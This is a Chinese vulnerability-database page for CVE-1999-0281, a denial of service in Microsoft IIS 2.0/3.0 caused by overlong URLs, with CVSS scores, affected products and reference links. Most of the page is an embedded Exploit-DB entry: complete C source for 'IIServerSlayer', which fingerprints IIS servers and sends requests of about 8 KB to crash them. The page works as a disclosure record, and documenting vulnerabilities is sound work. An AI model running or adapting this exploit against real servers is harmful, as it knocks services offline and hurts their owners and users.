CVE-1999-0281
CVSS5.0
发布时间 :1997-06-01 00:00:00
修订时间 :2008-09-09 08:34:10
NMCOE    

[原文]Denial of service in IIS using long URLs.


[CNNVD]IIS服务拒绝漏洞(CNNVD-199706-003)

        IIS通过长URLs导致服务拒绝。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:internet_information_server:3.0Microsoft IIS 3.0
cpe:/a:microsoft:internet_information_server:2.0Microsoft IIS 2.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0281
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0281
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199706-003
(官方数据源) CNNVD

- 其它链接及资源

- 漏洞信息

IIS服务拒绝漏洞
中危 未知
1997-06-01 00:00:00 2005-05-02 00:00:00
远程  
        IIS通过长URLs导致服务拒绝。

- 公告与补丁

        

- 漏洞信息 (20802)

Microsoft IIS 2.0/3.0 Long URL Denial of Service Vulnerability (EDBID:20802)
windows remote
1997-06-21 Verified
0 Andrea Arcangeli
N/A [点击下载]
source: http://www.securityfocus.com/bid/2654/info

Microsoft Internet Information Server is vulnerable to a denial of service.

This particular denial of service affects versions 2.0, 3.0 and 4.0 of the server prior to service pack 4.

The URL which causes this issue is of the format "http://server/?anything=XXXXX" - note that no existing file need be requested.

This is not a buffer overflow; a URL of specific length must be sent (between 4k and 8k), anything longer or shorter will not affect the server. 

/* Some days ago I found the page http://www.eden.com/~tfast/jihad.html
   Then I found the java program IIServerSlayer.class made by
   Todd Fast <tfast@eden.com>, the author of the web pages.
   Now I have ported that program in gcc from java using strace and
   disassembling IIServerSlayer.class with javap (part of jdk).

   For now is tested by me only on Linux 2.1.42 compiled with gcc 2.7.2.2
   and glibc.
                by Andrea Arcangeli <arcangeli@mbox.queen.it> */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <signal.h>

int s;
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;

int open_sock(int sock, char *server, int port) {
  struct sockaddr_in blah;
  struct hostent *he;
  bzero((char *)&blah,sizeof(blah));
  blah.sin_family=AF_INET;
  blah.sin_port=htons(port);
  if ((he = gethostbyname(server)) != NULL) {
    bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
  }
  else {
    if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
      perror("gethostbyname()");
      return(2);
    }
  }
  if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
    perror("connect()");
    close(sock);
    return(3);
  }
  return 0;
}

char *generate_die_string(int lenght) {
  char letter='X';
  char *str_begin = "GET /?bye=",*str_end = " HTTP/1.0\r\n\r\n",*str;
  int i;
  str = (char *)malloc(lenght+strlen(str_end)+strlen(str_begin)+1);
  strcpy(str,str_begin);
  for(i=strlen(str_begin);i<lenght+strlen(str_begin);i++) str[i] = letter;
  str[i]=0;
  strcat(str,str_end);
  return (char *)str;
}

void IIServerSlayer(char *target,int lenght,int port,int flags) {
  char buff[2],header[512],*IIS_string = "Server: Microsoft-IIS/3.0";
  char *IIS_patch = "Bad Request";
  int count = 0,return_status;
  if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
    perror("socket()");
    exit(1);
  }
  if((return_status = open_sock(s,target,port))) exit(return_status);
  if(lenght) printf("Sending request lenght = %d to %s\n",lenght,target);
  else printf("Sending request to test if %s is a Microsoft-IIS/3.0 server\n"
              ,target);
  send(s,generate_die_string(lenght),strlen(generate_die_string(lenght)),0);
  printf("Waiting for the reply from %s\n",target);
  buff[1]=0;
  while(recv(s,buff,1,0) == 1) {
    if(flags & 1) printf("%s",buff);
    else if(!div(count,50).rem) printf(".");
    if(count < 511) header[count]=buff[0];
    count++;
  }
  printf("\n");
  header[511]=0;
  if(strstr(header,IIS_string) == NULL && lenght == 0) {
    printf("This is not a Microsoft-IIS/3.0 web server\n");
    if(!(flags & 2)) exit(0);
  }
  else if(!lenght) printf("Ok, this is a Microsoft-IIS/3.0 web server\n");
  if(strstr(header,IIS_patch) != NULL) {
    printf("This IIS/3.0 web server is patched against this exploit\n");
    if(!(flags & 2)) exit(0);
  }
  close(s);
}

void main(int argc,char **argv)
{
  int i = 1,port = 80,lenght = 8180,flags = 0,param = 0,pid;
  if (argc < 2 ) {
    printf("Usage: %s [-v] [-f] <target> [string_lenght] [port]\n",argv[0]);
    printf("[-v] = verbose mode to view the server reply\n");
    printf("[-f] = force running over non or patched IIS/3.0 web server\n");
    exit(0);
  }
  for(i=1;i<argc;i++) {
    if(!strcmp(argv[i],"-v")) { param++; flags |= 1; }
    if(!strcmp(argv[i],"-f")) { param++; flags |= 2; }
  }
  if(argc > param+2) lenght = atoi(argv[param+2]);
  if(argc > param+3) port = atoi(argv[param+3]);
  for(i=0;i<3;i++,lenght++) {
    if(i) IIServerSlayer(argv[param+1],lenght,port,flags);
    else IIServerSlayer(argv[param+1],0,port,flags);
    if(i == 1 || i == 0) lenght--;
  }
  if((pid = fork())) {
    if(pid == -1) {
      perror("I can' t fork\n");
      exit(-1);
    }
    usleep(60000000); /* wait for 1 minute */
    kill(pid,SIGTERM);
  }
  else {
    IIServerSlayer(argv[param+1],lenght,port,flags);
    printf("Sorry, %s is alive yet\n",argv[param+1]);
  }
  exit(0);
}




		

- 漏洞信息

1804
Microsoft IIS Long Request Parsing Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Patch / RCS
Exploit Public Vendor Verified, Third-party Verified

- 漏洞描述

- 时间线

1997-06-21 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站